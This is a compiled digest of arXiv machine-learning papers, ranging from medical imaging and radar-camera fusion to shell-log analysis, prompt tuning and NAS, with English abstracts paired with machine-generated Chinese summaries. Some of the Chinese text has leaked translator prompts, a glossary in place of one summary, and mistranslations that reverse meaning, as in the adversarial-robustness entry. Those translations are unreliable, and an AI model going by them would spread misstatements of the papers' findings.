methods: 提案方法称为医疗影像语言预训（M-FLAG），利用冻结的语言模型来稳定训练过程，并导入一个新的正交对角对映损失函数来调和隐藏空间几何。
results: 实验结果显示，M-FLAG可以与现有的医疗影像语言预训方法相比，在三个下游任务中表现出色，包括医疗影像分类、分割和物体检测。尤其是在分割任务中，M-FLAG只使用RSNA数据集的1%，仍能超越已经精通ImageNet预训模型的 Fine-tuning 。

Abstract
Medical vision-language models enable co-learning and integrating features from medical imaging and clinical text. However, these models are not easy to train and the latent representation space can be complex. Here we propose a novel way for pre-training and regularising medical vision-language models. The proposed method, named Medical vision-language pre-training with Frozen language models and Latent spAce Geometry optimization (M-FLAG), leverages a frozen language model for training stability and efficiency and introduces a novel orthogonality loss to harmonize the latent space geometry. We demonstrate the potential of the pre-trained model on three downstream tasks: medical image classification, segmentation, and object detection. Extensive experiments across five public datasets demonstrate that M-FLAG significantly outperforms existing medical vision-language pre-training approaches and reduces the number of parameters by 78\%. Notably, M-FLAG achieves outstanding performance on the segmentation task while using only 1\% of the RSNA dataset, even outperforming ImageNet pre-trained models that have been fine-tuned using 100\% of the data.

摘要
医疗视力语言模型可以同时学习医疗影像和临床文本特征。然而，这些模型不易于训练，其潜在表示空间也可能复杂。在这篇文章中，我们提出了一种新的医疗视力语言预训练方法，名为医疗视力语言预训练器（M-FLAG）。M-FLAG利用冻结的语言模型来保证训练稳定性和效率，并引入一种新的正交准则来融和潜在表示空间的几何结构。我们在三个下游任务上进行了广泛的实验：医疗影像分类、 segmentation 和物体检测。结果表明，M-FLAG在这些任务上显著超过了现有的医疗视力语言预训练方法，并将参数数量减少了78%。尤其是在分割任务上，M-FLAG只使用了RSNA数据集的1%，而且even outperform ImageNet预训练模型，这些模型在100%的数据上进行了细化。

Multi-Task Cross-Modality Attention-Fusion for 2D Object Detection

paper_url: http://arxiv.org/abs/2307.08339
repo_url: None
paper_authors: Huawei Sun, Hao Feng, Georg Stettinger, Lorenzo Servadei, Robert Wille
for: 本研究旨在提高自动驾驶中的精准和可靠对象检测，尤其是在不良天气和夜间场景下。
methods: 本研究提出了两种新的雷达处理技术，以更好地与摄像头数据相匹配。此外，我们还提出了一种多任务交叉模态注意力融合网络（MCAF-Net），用于对象检测和自由空间分割。
results: 我们的方法在nuScenes数据集上比现有的雷达摄像头融合基于对象检测器表现更好，特别是在不良天气和夜间场景下。我们的方法还能够更好地利用特征地图信息，从而提高对象检测的精度和可靠性。

Abstract
Accurate and robust object detection is critical for autonomous driving. Image-based detectors face difficulties caused by low visibility in adverse weather conditions. Thus, radar-camera fusion is of particular interest but presents challenges in optimally fusing heterogeneous data sources. To approach this issue, we propose two new radar preprocessing techniques to better align radar and camera data. In addition, we introduce a Multi-Task Cross-Modality Attention-Fusion Network (MCAF-Net) for object detection, which includes two new fusion blocks. These allow for exploiting information from the feature maps more comprehensively. The proposed algorithm jointly detects objects and segments free space, which guides the model to focus on the more relevant part of the scene, namely, the occupied space. Our approach outperforms current state-of-the-art radar-camera fusion-based object detectors in the nuScenes dataset and achieves more robust results in adverse weather conditions and nighttime scenarios.

摘要
<>转换给定文本到简化中文。自动驾驶需要精准和可靠的对象检测，图像基于的检测器在不利的天气条件下会遇到困难。因此，雷达-相机融合非常有优势，但是将异构数据源合并优化又是一个挑战。为解决这个问题，我们提出了两种新的雷达预处理技术，以更好地对准雷达和相机数据。此外，我们还介绍了一种多任务跨模态注意力融合网络（MCAF-Net），用于对象检测，其中包括两种新的融合块。这些块使得可以更好地利用特征地图中的信息。我们的方法同时检测对象和分割空间，使模型能够更好地专注于场景中更重要的部分，即占用空间。我们的方法在nuScenes数据集中比现有的雷达-相机融合基于对象检测器更高效和更稳定，在不利的天气和夜晚 scenarios 中也达到了更好的效果。

Analyzing the Impact of Adversarial Examples on Explainable Machine Learning

paper_url: http://arxiv.org/abs/2307.08327
repo_url: None
paper_authors: Prathyusha Devabhakthini, Sasmita Parida, Raj Mani Shukla, Suvendu Chandan Nayak
for: 本研究探讨了因为对深度学习模型的抗击攻击而导致的模型解释性的影响，尤其是在文本分类问题上。
methods: 我们开发了一个基于机器学习的文本数据分类模型，然后引入了对文本数据的抗击偏移来评估模型的分类性能 после攻击。
results: 我们发现了对文本数据的抗击偏移会导致模型的解释性受到影响，并且我们可以通过分析模型的解释来理解攻击后模型的性能下降的原因。

Abstract
Adversarial attacks are a type of attack on machine learning models where an attacker deliberately modifies the inputs to cause the model to make incorrect predictions. Adversarial attacks can have serious consequences, particularly in applications such as autonomous vehicles, medical diagnosis, and security systems. Work on the vulnerability of deep learning models to adversarial attacks has shown that it is very easy to make samples that make a model predict things that it doesn't want to. In this work, we analyze the impact of model interpretability due to adversarial attacks on text classification problems. We develop an ML-based classification model for text data. Then, we introduce the adversarial perturbations on the text data to understand the classification performance after the attack. Subsequently, we analyze and interpret the model's explainability before and after the attack

摘要
<>translate "Adversarial attacks are a type of attack on machine learning models where an attacker deliberately modifies the inputs to cause the model to make incorrect predictions. Adversarial attacks can have serious consequences, particularly in applications such as autonomous vehicles, medical diagnosis, and security systems. Work on the vulnerability of deep learning models to adversarial attacks has shown that it is very easy to make samples that make a model predict things that it doesn't want to. In this work, we analyze the impact of model interpretability due to adversarial attacks on text classification problems. We develop an ML-based classification model for text data. Then, we introduce the adversarial perturbations on the text data to understand the classification performance after the attack. Subsequently, we analyze and interpret the model's explainability before and after the attack." into 简化字 Simplified Chinese.Here's the translation: Adversarial attacks 是一种对机器学习模型的攻击，攻击者故意修改输入，使模型作出错误预测。这些攻击可能有严重的后果，特别是在自动驾驶、医疗诊断和安全系统等应用中。工作表明，深度学习模型对 adversarial attacks 的抵触性很强，可以轻松地制造出导致模型预测错误的样本。在这种情况下，我们分析了文本分类问题中模型解释性受到 adversarial attacks 的影响。我们开发了一个基于机器学习的文本分类模型，然后引入了对文本数据的perturbations，以理解攻击后的分类性能。接着，我们分析和解释模型之前和之后攻击的解释性。

LogPrécis: Unleashing Language Models for Automated Shell Log Analysis

paper_url: http://arxiv.org/abs/2307.08309
repo_url: None
paper_authors: Matteo Boffa, Rodolfo Vieira Valentim, Luca Vassio, Danilo Giordano, Idilio Drago, Marco Mellia, Zied Ben Houidi
for: 本研究旨在利用语言模型（LM）自动分析文本类 Unix shell 攻击日志，以提高安全专家对攻击行为的理解和诊断。
methods: 本研究使用了当今最佳的 LM 技术，开发了名为 LogPr'ecis 的系统，可以对 Unix shell 会话进行自动分析，并将攻击者策略分配给每个会话部分。
results: 对两个大数据集，包含约400,000个 Unix shell 攻击，LogPr'ecis 可以将其缩减为约3,000个指纹，每个指纹都是Session中的攻击者策略的序列。LogPr'ecis 提供的抽象可以帮助分析员更好地理解攻击，识别指纹，检测新型攻击、连接相似攻击和跟踪家族和变化。

Abstract
The collection of security-related logs holds the key to understanding attack behaviors and diagnosing vulnerabilities. Still, their analysis remains a daunting challenge. Recently, Language Models (LMs) have demonstrated unmatched potential in understanding natural and programming languages. The question arises whether and how LMs could be also useful for security experts since their logs contain intrinsically confused and obfuscated information. In this paper, we systematically study how to benefit from the state-of-the-art in LM to automatically analyze text-like Unix shell attack logs. We present a thorough design methodology that leads to LogPr\'ecis. It receives as input raw shell sessions and automatically identifies and assigns the attacker tactic to each portion of the session, i.e., unveiling the sequence of the attacker's goals. We demonstrate LogPr\'ecis capability to support the analysis of two large datasets containing about 400,000 unique Unix shell attacks. LogPr\'ecis reduces them into about 3,000 fingerprints, each grouping sessions with the same sequence of tactics. The abstraction it provides lets the analyst better understand attacks, identify fingerprints, detect novelty, link similar attacks, and track families and mutations. Overall, LogPr\'ecis, released as open source, paves the way for better and more responsive defense against cyberattacks.

摘要
集成安全相关的日志可能是了解攻击者行为和诊断漏洞的钥匙。然而，它们的分析仍然是一项挑战。现在，语言模型（LM）已经在理解自然语言和编程语言方面展现出无与伦比的潜力。问题在于何时和如何使用LM来帮助安全专家分析含有各种各样信息的日志。在这篇论文中，我们系统地研究了如何利用当前的LM来自动分析文本类 Unix shell 攻击日志。我们提出了一种完整的设计方法，即LogPr\'ecis。它接受 raw shell 会话作为输入，并自动将攻击者策略分配到每个会话中的每个部分，即揭示攻击者的目标顺序。我们示例了LogPr\'ecis 对两个大数据集（包含约400,000个Uniix shell 攻击）的分析。LogPr\'ecis 将这些数据缩减成约3,000个指纹，每个指纹集成了与同样的策略序列相关的会话。这种抽象使得分析员更好地理解攻击，识别指纹，检测新特征，连接相似的攻击，跟踪家族和变化。总之，LogPr\'ecis，作为开源软件，为防御 против网络攻击提供了更好和更快的反应。

A Novel Multi-Task Model Imitating Dermatologists for Accurate Differential Diagnosis of Skin Diseases in Clinical Images

paper_url: http://arxiv.org/abs/2307.08308
repo_url: None
paper_authors: Yan-Jie Zhou, Wei Liu, Yuan Gao, Jing Xu, Le Lu, Yuping Duan, Hao Cheng, Na Jin, Xiaoyong Man, Shuang Zhao, Yu Wang
for: 这个研究旨在提出一个具有执行力的电脑支持 skin 疾病诊断方法，以帮助皮肤科医生和患者更好地诊断皮肤疾病。
methods: 本研究提出了一个名为 DermImitFormer 的多任务模型，该模型通过多任务学习同时预测身体部位和肿瘤特征以及疾病本身，从而提高诊断精度和诊断解释性。此外，研究还提出了一个精确地 zoom-in 到肿瘤特征的选择模组，以及一个模型 complicated 的诊断推理之间的交互模块。
results: 实验结果显示，DermImitFormer 在三个不同的数据集上均能够实现顶尖的识别性能，并且在诊断皮肤疾病中具有更高的精度和解释性。

Abstract
Skin diseases are among the most prevalent health issues, and accurate computer-aided diagnosis methods are of importance for both dermatologists and patients. However, most of the existing methods overlook the essential domain knowledge required for skin disease diagnosis. A novel multi-task model, namely DermImitFormer, is proposed to fill this gap by imitating dermatologists' diagnostic procedures and strategies. Through multi-task learning, the model simultaneously predicts body parts and lesion attributes in addition to the disease itself, enhancing diagnosis accuracy and improving diagnosis interpretability. The designed lesion selection module mimics dermatologists' zoom-in action, effectively highlighting the local lesion features from noisy backgrounds. Additionally, the presented cross-interaction module explicitly models the complicated diagnostic reasoning between body parts, lesion attributes, and diseases. To provide a more robust evaluation of the proposed method, a large-scale clinical image dataset of skin diseases with significantly more cases than existing datasets has been established. Extensive experiments on three different datasets consistently demonstrate the state-of-the-art recognition performance of the proposed approach.

摘要
皮肤病是现代医学中最常见的健康问题，而计算机助成诊断方法对于皮肤科医生和患者都是非常重要的。然而，现有的大多数方法忽略了皮肤病诊断中所需的基本领域知识。本文提出了一种新的多任务模型，namely DermImitFormer，以模仿皮肤科医生的诊断过程和策略。通过多任务学习，模型同时预测身体部位和肿瘤特征以及疾病本身，从而提高诊断准确性和诊断可读性。设计的肿瘤选择模块模仿了皮肤科医生的缩进操作，有效地强调背景中的肿瘤特征。此外，提出的交叉交互模块Explicitly模型了肿瘤特征、身体部位和疾病之间的复杂的诊断关系。为了更加Robust地评估提议方法，我们建立了一个大规模的皮肤病图像数据集，包含了现有数据集的多倍的患者。广泛的实验表明，提议的方法在三个不同的数据集上具有现代识别性能。

Efficient Computation of Counterfactual Bounds

paper_url: http://arxiv.org/abs/2307.08304
repo_url: None
paper_authors: Marco Zaffalon, Alessandro Antonucci, Rafael Cabañas, David Huber, Dario Azzimonti
for: 本研究的目的是计算基于部分可Identifiable counterfactual queries的上下文 bounds。
methods: 本研究使用了从Structural causal model maps to credal nets的方法，以及基于 credal nets的算法来计算 exact counterfactual bounds。
results: 研究表明，使用 causal EM scheme可以得到准确的approximate bounds，并且通过提供credible intervals来评估其准确性。Synthetic benchmark表明，EM scheme在一定数量的运行中能够实现准确的结果。此外，研究还指出了一种常neglected的限制，即counterfactual bounds计算不需要知道结构方程的情况下是不可靠的。

Abstract
We assume to be given structural equations over discrete variables inducing a directed acyclic graph, namely, a structural causal model, together with data about its internal nodes. The question we want to answer is how we can compute bounds for partially identifiable counterfactual queries from such an input. We start by giving a map from structural casual models to credal networks. This allows us to compute exact counterfactual bounds via algorithms for credal nets on a subclass of structural causal models. Exact computation is going to be inefficient in general given that, as we show, causal inference is NP-hard even on polytrees. We target then approximate bounds via a causal EM scheme. We evaluate their accuracy by providing credible intervals on the quality of the approximation; we show through a synthetic benchmark that the EM scheme delivers accurate results in a fair number of runs. In the course of the discussion, we also point out what seems to be a neglected limitation to the trending idea that counterfactual bounds can be computed without knowledge of the structural equations. We also present a real case study on palliative care to show how our algorithms can readily be used for practical purposes.

摘要
我们假设我们获得了结构方程模型，即直接数据图，以及这个模型内部节点的数据。我们想要解答一个问题：如何从这个输入中计算对 partly 可识别的 counterfactual 查询中的范围。我们开始通过将结构 causal 模型映射到信义网络中，以便通过信义网络的算法来计算精确的 counterfactual 范围。但是，我们表明，因为我们展示的是 causal 推理是 NP-hard 的，因此精确的计算通常是不可能的。我们遂提出一个近似的 bounds 方法，基于 causal EM 架构。我们评估了这个方法的准确性，通过提供信义interval 来评估近似的质量。我们透过一个 sintetic benchmark 表明，EM 架构实际上可以获得正确的结果。在讨论中，我们还指出了一个忽略的限制，即 counterfactual 范围可以computed without 知情 structural 方程的假设。我们还提供了一个实际应用的例子，关于palliative care。

Soft Prompt Tuning for Augmenting Dense Retrieval with Large Language Models

paper_url: http://arxiv.org/abs/2307.08303
repo_url: https://github.com/zhiyuanpeng/sptar
paper_authors: Zhiyuan Peng, Xuyang Wu, Yi Fang
for:这篇论文主要针对的是提高 dense retrieval（DR）模型的性能，特别是在没有域pecific的训练数据的情况下。methods:这篇论文提出了一种基于 soft prompt tuning（SPTAR）的方法，通过优化任务特定的软提问来提高 LLMs 的表现，并使用这些提问来标注无标注文档。results:实验表明，SPTAR 在无监督基elines上超越 BM25 和 latest 提出的 LLMs-based 增强方法。

Abstract
Dense retrieval (DR) converts queries and documents into dense embeddings and measures the similarity between queries and documents in vector space. One of the challenges in DR is the lack of domain-specific training data. While DR models can learn from large-scale public datasets like MS MARCO through transfer learning, evidence shows that not all DR models and domains can benefit from transfer learning equally. Recently, some researchers have resorted to large language models (LLMs) to improve the zero-shot and few-shot DR models. However, the hard prompts or human-written prompts utilized in these works cannot guarantee the good quality of generated weak queries. To tackle this, we propose soft prompt tuning for augmenting DR (SPTAR): For each task, we leverage soft prompt-tuning to optimize a task-specific soft prompt on limited ground truth data and then prompt the LLMs to tag unlabeled documents with weak queries, yielding enough weak document-query pairs to train task-specific dense retrievers. We design a filter to select high-quality example document-query pairs in the prompt to further improve the quality of weak tagged queries. To the best of our knowledge, there is no prior work utilizing soft prompt tuning to augment DR models. The experiments demonstrate that SPTAR outperforms the unsupervised baselines BM25 and the recently proposed LLMs-based augmentation method for DR.

摘要
dense retrieval (DR) 将查询和文档转换为密集表示并测量查询和文档在向量空间的相似性。DR模型的一个挑战是缺乏域专的训练数据。虽然DR模型可以通过转移学习从大规模公共数据集如MS MARCO进行学习，但证据表明不 todos los DR模型和领域都可以从转移学习中受益。在这些研究中，一些研究人员使用大型自然语言模型（LLM）来改进零shot和几shot DR模型。然而，使用这些工作中的硬提问或人工写的提问无法保证生成的弱查询的质量。为了解决这个问题，我们提出了软提问调整 для增强DR（SPTAR）：对每个任务，我们利用软提问调整来优化任务特定的软提问，然后使用LLM进行标注未标注的文档，生成弱查询。我们设计了一个筛选器，以选择高质量的示例文档-查询对，进一步改进弱标记的查询质量。到目前为止，没有先前的工作使用软提问调整来增强DR模型。实验结果表明，SPTAR超过了无监督基eline和最近提出的LLMs-based增强方法 дляDR。

ShiftNAS: Improving One-shot NAS via Probability Shift

paper_url: http://arxiv.org/abs/2307.08300
repo_url: https://github.com/bestfleer/shiftnas
paper_authors: Mingyang Zhang, Xinyi Yu, Haodong Zhao, Linlin Ou
for: 一种时间效率的 neural architecture search (NAS) 方法，可以在不同的复杂度情况下获得最优的子网架构和参数，只需要训练一次。
methods: 我们使用 shiftNAS，一种可以根据子网的复杂度调整抽象概率的方法，以及一种可以准确地提供子网的架构的建立方法。
results: 我们在多种视觉网络模型，包括卷积神经网络 (CNNs) 和视transformers (ViTs) 上进行了实验，并证明了 shiftNAS 是模型无关的。实验结果表明，shiftNAS 可以在 ImageNet 上提高一键 NAS 的性能，而无需额外的资源消耗。

Abstract
One-shot Neural architecture search (One-shot NAS) has been proposed as a time-efficient approach to obtain optimal subnet architectures and weights under different complexity cases by training only once. However, the subnet performance obtained by weight sharing is often inferior to the performance achieved by retraining. In this paper, we investigate the performance gap and attribute it to the use of uniform sampling, which is a common approach in supernet training. Uniform sampling concentrates training resources on subnets with intermediate computational resources, which are sampled with high probability. However, subnets with different complexity regions require different optimal training strategies for optimal performance. To address the problem of uniform sampling, we propose ShiftNAS, a method that can adjust the sampling probability based on the complexity of subnets. We achieve this by evaluating the performance variation of subnets with different complexity and designing an architecture generator that can accurately and efficiently provide subnets with the desired complexity. Both the sampling probability and the architecture generator can be trained end-to-end in a gradient-based manner. With ShiftNAS, we can directly obtain the optimal model architecture and parameters for a given computational complexity. We evaluate our approach on multiple visual network models, including convolutional neural networks (CNNs) and vision transformers (ViTs), and demonstrate that ShiftNAS is model-agnostic. Experimental results on ImageNet show that ShiftNAS can improve the performance of one-shot NAS without additional consumption. Source codes are available at https://github.com/bestfleer/ShiftNAS.

摘要
一种叫做One-shot Neural architecture search（One-shot NAS）的方法已经被提出，可以在不同的复杂度情况下获得优化的子网架构和参数，只需要训练一次。然而，通过重复使用的方法可以获得更好的性能。在这篇论文中，我们研究了这个性能差距，并归因于使用uniform sampling方法。uniform sampling会将训练资源集中在中等计算资源的子网上，这些子网具有高概率被采样。然而，不同的复杂度区域需要不同的优化训练策略以实现最佳性能。为了解决uniform sampling问题，我们提出了ShiftNAS方法。ShiftNAS可以根据子网的复杂度调整采样概率，以便直接从一个给定的计算复杂度中获得最佳的模型架构和参数。我们可以通过评估不同复杂度下子网的性能变化，并设计一个可以准确和高效地提供子网的架构生成器。采样概率和架构生成器都可以通过梯度下降方式进行END-TO-END训练。ShiftNAS是模型无关的，我们在多种视觉网络模型，包括卷积神经网络（CNN）和视Transformers（ViTs）中进行了实验，并证明了ShiftNAS可以提高一键 NAS的性能。实验结果表明，ShiftNAS可以在ImageNet上提高性能，而不需要额外的资源。代码可以在https://github.com/bestfleer/ShiftNAS上下载。

Abductive Reasoning with the GPT-4 Language Model: Case studies from criminal investigation, medical practice, scientific research

paper_url: http://arxiv.org/abs/2307.10250
repo_url: None
paper_authors: Remo Pareschi
for: 这项研究评估了GPT-4大语言模型在复杂领域如医学诊断、刑事学和 cosmology 中的推理能力。
methods: 这项研究使用了交互式采访 Format，AI助手表现了可靠性在生成和选择假设方面。
results: 研究发现，GPT-4大语言模型可靠地生成和选择假设，并在医学诊断、刑事学和 cosmology 中提供了可能的医疗诊断、刑事原因和 cosmology 解释。

Abstract
This study evaluates the GPT-4 Large Language Model's abductive reasoning in complex fields like medical diagnostics, criminology, and cosmology. Using an interactive interview format, the AI assistant demonstrated reliability in generating and selecting hypotheses. It inferred plausible medical diagnoses based on patient data and provided potential causes and explanations in criminology and cosmology. The results highlight the potential of LLMs in complex problem-solving and the need for further research to maximize their practical applications.

摘要
Note:* "GPT-4" 被翻译为 "GPT-4 Large Language Model"* "abductive reasoning" 被翻译为 "推理"* "complex fields" 被翻译为 "复杂的领域"* "interactive interview format" 被翻译为 "互动式采访形式"* "hypotheses" 被翻译为 "假设"* "patient data" 被翻译为 "病人数据"* "cosmology" 被翻译为 " cosmology"

Going Beyond Linear Mode Connectivity: The Layerwise Linear Feature Connectivity

paper_url: http://arxiv.org/abs/2307.08286
repo_url: None
paper_authors: Zhanpeng Zhou, Yongyi Yang, Xiaojiang Yang, Junchi Yan, Wei Hu
for: 这研究探讨了神经网络训练中复杂的损失 landscape 和训练 dynamics 中的一些新领域现象, 其中 Linear Mode Connectivity (LMC) 引起了广泛的关注，因为它表明不同的解可以在参数空间中 Linear 连接，保持 nearly constant 的训练和测试损失。methods: 这研究引入了一种更强的线性连接概念，即层wise Linear Feature Connectivity (LLFC)，它表明每层的特征图在不同训练网络中是线性连接的。研究提供了广泛的实验证据，证明当两个训练网络满足 LMC （通过生成或排序方法）时，它们也总是满足 LLFC 在大多数层。results: 研究发现，LLFC 在各层中的实现，对于不同的训练方法和模型来说，都是一个通用的现象。这些结果不仅证明了 LMC 和 LLFC 之间的关系，还探讨了这两种方法的内在逻辑。

Abstract
Recent work has revealed many intriguing empirical phenomena in neural network training, despite the poorly understood and highly complex loss landscapes and training dynamics. One of these phenomena, Linear Mode Connectivity (LMC), has gained considerable attention due to the intriguing observation that different solutions can be connected by a linear path in the parameter space while maintaining near-constant training and test losses. In this work, we introduce a stronger notion of linear connectivity, Layerwise Linear Feature Connectivity (LLFC), which says that the feature maps of every layer in different trained networks are also linearly connected. We provide comprehensive empirical evidence for LLFC across a wide range of settings, demonstrating that whenever two trained networks satisfy LMC (via either spawning or permutation methods), they also satisfy LLFC in nearly all the layers. Furthermore, we delve deeper into the underlying factors contributing to LLFC, which reveal new insights into the spawning and permutation approaches. The study of LLFC transcends and advances our understanding of LMC by adopting a feature-learning perspective.

摘要
最近的研究发现了许多神秘的实际现象在神经网络训练中，尽管损失地形和训练动态还未完全理解。一种这些现象是线性模式连接（LMC），它因为训练和测试损失保持相对常数的情况下，连接不同解的线性路径在参数空间而吸引了广泛的关注。在这篇文章中，我们引入了一种更强的线性连接概念，层次线性特征连接（LLFC），它表示每个层的特征图在不同训练网络中是线性连接的。我们提供了广泛的实验证据，证明在大多数情况下，当两个训练网络满足LMC（通过生成或排序方法）时，它们也满足LLFC在大多数层。此外，我们还探究了LLFC的下面因素，这些因素揭示了生成和排序方法的新的视角。研究LLFC超越了和掌握LMC的理解，采用特征学习的视角。

Deep Neural Networks and Brain Alignment: Brain Encoding and Decoding (Survey)

paper_url: http://arxiv.org/abs/2307.10246
repo_url: None
paper_authors: Subba Reddy Oota, Manish Gupta, Raju S. Bapi, Gael Jobard, Frederic Alexandre, Xavier Hinaut
for: 这个论文的目的是为了研究大脑如何表示不同的信息模式。
methods: 这篇论文使用了functional magnetic resonance imaging（fMRI）记录来研究大脑的记忆和语言处理。
results: 这篇论文提出了一些深度学习模型来解释大脑如何处理语言、视觉和听觉信息。

Abstract
How does the brain represent different modes of information? Can we design a system that automatically understands what the user is thinking? Such questions can be answered by studying brain recordings like functional magnetic resonance imaging (fMRI). As a first step, the neuroscience community has contributed several large cognitive neuroscience datasets related to passive reading/listening/viewing of concept words, narratives, pictures and movies. Encoding and decoding models using these datasets have also been proposed in the past two decades. These models serve as additional tools for basic research in cognitive science and neuroscience. Encoding models aim at generating fMRI brain representations given a stimulus automatically. They have several practical applications in evaluating and diagnosing neurological conditions and thus also help design therapies for brain damage. Decoding models solve the inverse problem of reconstructing the stimuli given the fMRI. They are useful for designing brain-machine or brain-computer interfaces. Inspired by the effectiveness of deep learning models for natural language processing, computer vision, and speech, recently several neural encoding and decoding models have been proposed. In this survey, we will first discuss popular representations of language, vision and speech stimuli, and present a summary of neuroscience datasets. Further, we will review popular deep learning based encoding and decoding architectures and note their benefits and limitations. Finally, we will conclude with a brief summary and discussion about future trends. Given the large amount of recently published work in the `computational cognitive neuroscience' community, we believe that this survey nicely organizes the plethora of work and presents it as a coherent story.

摘要
如何使潜意识表示不同的信息？可以通过研究大脑磁共振成像（fMRI）来回答这些问题。作为一个第一步，神经科学社区已经提供了许多大脑认知神经科学数据集，关于静止阅读/听写/观看概念词、故事、图片和电影。使用这些数据集，已经提出了许多过去两十年的编码和解码模型。这些模型可以用于基础研究神经科学和认知科学。编码模型的目标是自动生成fMRI大脑表示，它们有许多实际应用，如评估和诊断神经系统疾病，以及设计神经系统损伤的治疗。解码模型的目标是使用fMRI重建刺激，它们可以用于设计大脑机器或大脑计算机界面。受到深度学习模型在自然语言处理、计算机视觉和语音处理方面的成功，最近几年内，有许多神经编码和解码模型被提出。在这篇评论中，我们将首先讨论语言、视觉和听说刺激的流行表示方法，并提供大脑认知神经科学数据集的总览。然后，我们将回顾深度学习基于编码和解码架构的优点和局限性。最后，我们将结束 WITH 一个简短的总结和讨论，关于未来趋势。由于最近出版的大量研究在`计算认知神经科学`社区中，我们认为这篇评论非常有用，可以将这些研究组织成一个听起来的故事。

Team Badminseok at IJCAI CoachAI Badminton Challenge 2023: Multi-Layer Multi-Input Transformer Network (MuLMINet) with Weighted Loss

paper_url: http://arxiv.org/abs/2307.08262
repo_url: https://github.com/stan5dard/IJCAI-CoachAI-Challenge-2023
paper_authors: Minwoo Seong, Jeongseok Oh, SeungJun Kim
for: 这个研究是为了使用人工智能技术（AI）来分析羽毛球比赛的资料，以便更好地评估策略和训练计划。
methods: 这个研究使用了多层多输入变数推导器网络（Multi-Layer Multi-Input Transformer Network，简称MuLMINet），利用了职业羽毛球选手比赛资料来准确地预测未来的球型和位置坐标。
results: 这个研究的结果是在IJCAI CoachAI Badminton Challenge 2023, Track 2中获得亚军（第二名）。此外，我们也将我们的代码公开在线上，以便对更广泛的研究社区做出贡献，并帮助进一步推动人工智能在体育分析领域的发展。

Abstract
The increasing use of artificial intelligence (AI) technology in turn-based sports, such as badminton, has sparked significant interest in evaluating strategies through the analysis of match video data. Predicting future shots based on past ones plays a vital role in coaching and strategic planning. In this study, we present a Multi-Layer Multi-Input Transformer Network (MuLMINet) that leverages professional badminton player match data to accurately predict future shot types and area coordinates. Our approach resulted in achieving the runner-up (2nd place) in the IJCAI CoachAI Badminton Challenge 2023, Track 2. To facilitate further research, we have made our code publicly accessible online, contributing to the broader research community's knowledge and advancements in the field of AI-assisted sports analysis.

摘要
人工智能技术在回合性体育运动，如羽毛球，的应用越来越普遍，导致评估策略通过对比赛视频数据进行分析得到了广泛的关注。预测未来的击球种类和位置坐标是训练和战略规划中非常重要的一环。在这种研究中，我们介绍了一种多层多输入变换器网络（MuLMINet），利用专业羽毛球运动员的比赛数据来准确预测未来的击球种类和位置坐标。我们的方法在IJCAI CoachAI Badminton Challenge 2023年度赛事中获得了亚军（第二名），轨迹2。为了促进进一步的研究，我们在线上公开了我们的代码，对广泛的研究社区的知识和进步在人工智能辅助体育分析领域做出了贡献。

Transferable Graph Neural Fingerprint Models for Quick Response to Future Bio-Threats

paper_url: http://arxiv.org/abs/2308.01921
repo_url: None
paper_authors: Wei Chen, Yihui Ren, Ai Kagawa, Matthew R. Carbone, Samuel Yen-Chi Chen, Xiaohui Qu, Shinjae Yoo, Austin Clyde, Arvind Ramanathan, Rick L. Stevens, Hubertus J. J. van Dam, Deyu Liu
for:This paper aims to develop a high-throughput virtual screening method for COVID-19 drug discovery using graph neural fingerprints.methods:The authors use a dataset of 300,000 drug candidates and 23 coronavirus protein targets to train graph neural fingerprint docking models, which show high prediction accuracy with a mean squared error of less than 0.21 kcal/mol. They also propose a transferable graph neural fingerprint method trained on multiple targets, which exhibits comparable accuracy to target-specific models with superior training and data efficiency.results:The authors achieve significant improvement over conventional circular fingerprint methods in predicting docking scores, and demonstrate the transferability of their approach to unknown targets. They highlight the potential of their method for fast virtual ligand screening in the future battle against bio-threats.

Abstract
Fast screening of drug molecules based on the ligand binding affinity is an important step in the drug discovery pipeline. Graph neural fingerprint is a promising method for developing molecular docking surrogates with high throughput and great fidelity. In this study, we built a COVID-19 drug docking dataset of about 300,000 drug candidates on 23 coronavirus protein targets. With this dataset, we trained graph neural fingerprint docking models for high-throughput virtual COVID-19 drug screening. The graph neural fingerprint models yield high prediction accuracy on docking scores with the mean squared error lower than $0.21$ kcal/mol for most of the docking targets, showing significant improvement over conventional circular fingerprint methods. To make the neural fingerprints transferable for unknown targets, we also propose a transferable graph neural fingerprint method trained on multiple targets. With comparable accuracy to target-specific graph neural fingerprint models, the transferable model exhibits superb training and data efficiency. We highlight that the impact of this study extends beyond COVID-19 dataset, as our approach for fast virtual ligand screening can be easily adapted and integrated into a general machine learning-accelerated pipeline to battle future bio-threats.

摘要
Note: The text has been translated into Simplified Chinese, which is the standard writing system used in mainland China. The translation may not be exact, and some nuances or idioms may be lost in translation.

Where Did the President Visit Last Week? Detecting Celebrity Trips from News Articles

paper_url: http://arxiv.org/abs/2307.08721
repo_url: https://github.com/zhangdatalab/celetrip
paper_authors: Kai Peng, Ying Zhang, Shuai Ling, Zhaoru Ke, Haipeng Zhang
for: 这篇论文的目的是开发一种自动检测明星行程的工具，以便进行大规模和网络化分析。
methods: 论文使用文本内容图模型和注意力机制来处理新闻文章中的旅行信息，并采用特殊的pooling层和节点相似性来减少不相关信息。
results: 论文的提出方法（CeleTrip）在比较baseline模型的测试中，实现了82.53%的F1指标。

Abstract
Celebrities' whereabouts are of pervasive importance. For instance, where politicians go, how often they visit, and who they meet, come with profound geopolitical and economic implications. Although news articles contain travel information of celebrities, it is not possible to perform large-scale and network-wise analysis due to the lack of automatic itinerary detection tools. To design such tools, we have to overcome difficulties from the heterogeneity among news articles: 1)One single article can be noisy, with irrelevant people and locations, especially when the articles are long. 2)Though it may be helpful if we consider multiple articles together to determine a particular trip, the key semantics are still scattered across different articles intertwined with various noises, making it hard to aggregate them effectively. 3)Over 20% of the articles refer to the celebrities' trips indirectly, instead of using the exact celebrity names or location names, leading to large portions of trips escaping regular detecting algorithms. We model text content across articles related to each candidate location as a graph to better associate essential information and cancel out the noises. Besides, we design a special pooling layer based on attention mechanism and node similarity, reducing irrelevant information from longer articles. To make up the missing information resulted from indirect mentions, we construct knowledge sub-graphs for named entities (person, organization, facility, etc.). Specifically, we dynamically update embeddings of event entities like the G7 summit from news descriptions since the properties (date and location) of the event change each time, which is not captured by the pre-trained event representations. The proposed CeleTrip jointly trains these modules, which outperforms all baseline models and achieves 82.53% in the F1 metric.

摘要
